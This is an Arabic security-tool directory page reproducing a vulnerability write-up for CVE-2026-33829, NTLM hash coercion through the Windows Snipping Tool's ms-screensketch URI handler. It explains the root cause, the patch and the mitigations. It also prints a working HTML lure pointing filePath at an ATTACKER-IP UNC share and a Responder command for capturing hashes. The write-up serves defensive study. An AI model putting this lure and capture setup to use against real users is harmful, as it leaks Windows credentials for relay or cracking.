Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33829-Writeup — دراسة حالة ثغرة أمنية: CVE-2026-33829 (إكراه NTLM عبر أداة القصاصات في Windows) | Kitploit
أدوات/GitHubGitHub/rahultb-sec/cve-2026-33829-writeup
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتالتصيد الاحتياليالتعلم والتعليم
GitHubrahultb-sec/cve-2026-33829-writeup

CVE-2026-33829-Writeup

دراسة حالة ثغرة أمنية: CVE-2026-33829 (إكراه NTLM عبر أداة القصاصات في Windows)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

تقرير CVE-2026-33829

دراسة حالة ثغرة: CVE-2026-33829 (إجبار NTLM عبر أداة القص في ويندوز)

الملخص التنفيذي

يشرح هذا التقرير إعادة الإنتاج التقني لثغرة CVE-2026-33829، وهي ثغرة كشف معلومات داخل إطار عمل تطبيق أداة القص الحديث في ويندوز. من خلال استغلال معامل إدخال غير مُتحقق منه داخل معالج بروتوكول URI مخصص، يمكن لمضيف بعيد إجبار جهاز ويندوز غير مُحدَّث على بدء اتصال SMB صادر، مما ينتج عنه تسريب تجزئات مصادقة Net-NTLMv2 عبر الشبكة.

مخطط URI - (يستخدم ويندوز بروتوكولات مخصصة (مثل ms-screensketch:, ms-settings: , file:) للسماح لمتصفحات الويب بالتواصل مع تطبيقات سطح المكتب.

تحليل السبب الجذري

يكمن السبب الجذري لهذه الثغرة في مخطط URI (ms-screensketch:edit). عندما ينقر الضحية على رابط خبيث يحتوي على (ms-screensketch:edit?&filePath=\\ATTACKER_IP\\share\evil.png) ويوافق على "فتح أداة القص"، يستدعي نظام التشغيل الملف التنفيذي SnippingTool.exe ويمرر معامل filePath الخبيث، مثل (ms-screensketch:edit?filePath=\\ATTACKER-IP\\share\evil.png)، دون تحقق سليم.

ونظرًا لوجود معامل :edit?، تحاول أداة القص تحرير الملف من مسار الملف المقدم (filePath=\\ATTACKER-IP\\share\evil.png)، مما يؤدي إلى بدء اتصال عبر الشبكة باستخدام بروتوكول Server Message Block (SMB). ولأن SMB مصمم للتحقق من هوية طالب الملف، تحاول ويندوز تلقائيًا مصادقة المستخدم، وترسل تجزئة تحدّي-استجابة Net-NTLMv2 الخاصة بالمستخدم المسجل حاليًا إلى خادم المهاجم. تتم العملية برمتها بصمت في الخلفية دون أي تحذير أو مطالبة مرئية للمستخدم.

يلتقط المهاجم بيانات مصادقة تحدّي-استجابة Net-NTLMv2 الخاصة بالضحية. وبمجرد حصول المهاجم على تجزئة Net-NTLM الخاصة بالضحية، يمكنه تنفيذ هجوم إعادة توجيه NTLM (NTLM relay) لانتحال شخصية الضحية والوصول إلى موارد الشبكة الداخلية أو المصادقة على خدمات أخرى داخل المؤسسة، أو أخذ التجزئة الملتقطة واستخدام هجمات القوة الغاشمة أو هجمات القواميس لاكتشاف كلمة مرور ويندوز الفعلية للمستخدم.

إثبات المفهوم

لتشغيل المعالج، تم نشر حمولة HTML بسيطة لمحاكاة ناقل تصيد أو اختراق شبكة داخلية

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
  <button onclick="window.location.href='ms-screensketch:edit?&filePath=\\ATTACKER-IP\share\test.png&isTemporary=false&saved=true&source=Toast'">Launch Verification</button>
</body>
</html>
3

لالتقاط التجزئة، تم نشر نسخة معزولة من Kali Linux تعمل عليها أداة Responder

sudo responder -I eth0 -v

1

عند النقر على الزر داخل بيئة ويندوز المستهدفة، فتح التطبيق سياق التحرير (Edit) وجرى توجيه طلب SMB فورًا إلى المضيف المستمع. اكتمل تسلسل تحدّي-استجابة المصادقة بسلاسة، مما أدى إلى التقاط بنية تجزئة Net-NTLMv2 لسياق المستخدم المستهدف.

2 لقطة شاشة (103)

تُظهر حزمة NTLMSSP_NEGOTIATE قيام النظام الضحية ببدء مصادقة NTLM أثناء إعداد جلسة SMB بعد حل مسار UNC الذي يتحكم فيه المهاجم

لقطة شاشة (104)

تحتوي حزمة NTLMSSP_AUTH على بيانات مصادقة تحدّي-استجابة Net-NTLMv2 التي أرسلها النظام الضحية بعد اكتمال مرحلة التحدي.

من ذلك، يلتقط المهاجم تجزئة NTLMv2 الممرَّرة

4

يمكن استغلال بيانات تحدّي-استجابة Net-NTLMv2 الملتقطة في هجمات إعادة توجيه NTLM (NTLM relay) أو إخضاعها لمحاولات كسر كلمات المرور دون اتصال، حسب البيئة المستهدفة

الإصلاح

كيف قامت ويندوز بإصلاح هذا الأمر؟

قبل التحديث، كانت وظيفة التحرير في أداة القص تأخذ السلسلة داخل filePath وتمررها مباشرة إلى واجهات برمجة التطبيقات لفتح الملفات.

يشير السلوك الملاحَظ بعد التحديث إلى أن مايكروسوفت أدخلت منطق تحقق يمنع قيم filePath المستندة إلى UNC/الشبكة من الوصول إلى واجهات برمجة التطبيقات الأساسية لمعالجة الملفات. الآن، عند تمرير سلسلة إلى filePath، يجري التطبيق فحص سلامة قبل تسليمها إلى نظام التشغيل:

يتحقق مما إذا كانت السلسلة تبدأ بمحددات محركات أقراص محلية (مثل C:\ أو D:) أو متغيرات نظام محلية آمنة قياسية.

إذا اكتشف التطبيق بادئة اصطلاح التسمية العالمي (UNC) (مثل \ أو \\)، أو نمط عنوان IP خارجي على الشبكة، تضعها حلقة التحقق كوسيط غير قانوني، وترمي خطأ استثناء، وتنهي عملية تحميل الملف فورًا.

نظرًا لأن الكود يتوقف قبل تنفيذ تعليمات فتح الملفات الخاصة بـ Win32، فإن نواة ويندوز لا تتلقى الطلب أبدًا، ولا يتم إرسال أي حزمة SMB.

عند المحاولة مرة أخرى بعد تطبيق التحديث الأمني، استمر التطبيق في استدعاء معالج ms-screensketch:، لكن قيم filePath البعيدة لم تعد تُعالج عبر سير عمل التحرير (Edit)

تأكد من تحديث جميع نقاط نهاية ويندوز بما يتجاوز خط الأساس للتحديثات الأمنية الصادر في 14 أبريل 2026، والذي يقدم حدود تحقق صارمة من المدخلات لمعالج التطبيق.

فرض قواعد جدار حماية صارمة للاتصالات الصادرة تمنع حركة مرور منفذ TCP 445 إلى الشبكات الخارجية غير المصرح بها، للتخفيف من خطر تسريب بيانات الاعتماد.

تكوين كائنات نهج المجموعة (GPOs) لتقييد حركة مرور NTLM الصادرة إلى الخوادم البعيدة، وفرض بروتوكولات بديلة آمنة مثل Kerberos حيثما أمكن.

يُظهر التحليل اللاحق لثغرة CVE-2026-33829 كيف يمكن لسير عمل التطبيقات الموثوقة وسلوكيات المصادقة القديمة أن تعرّض بيانات الاعتماد دون قصد عبر تفاعلات الشبكة الصادرة. ورغم أن الثغرة لا توفر تنفيذًا مباشرًا للكود، فإنها تعزز أهمية تقييد مصادقة NTLM غير الضرورية، ومراقبة حركة مرور SMB الصادرة، والتحقق من معالجة الموارد المدفوعة بـ URI داخل بيئات ويندوز.

root@kitploit:~
         إخلاء مسؤولية: أُعدّ هذا التقرير لأغراض تعليمية وبحث دفاعي واختبار معملي فقط. تم تنفيذ جميع الاختبارات داخل بيئة معزولة تمامًا (sandbox).
تنزيل الأداة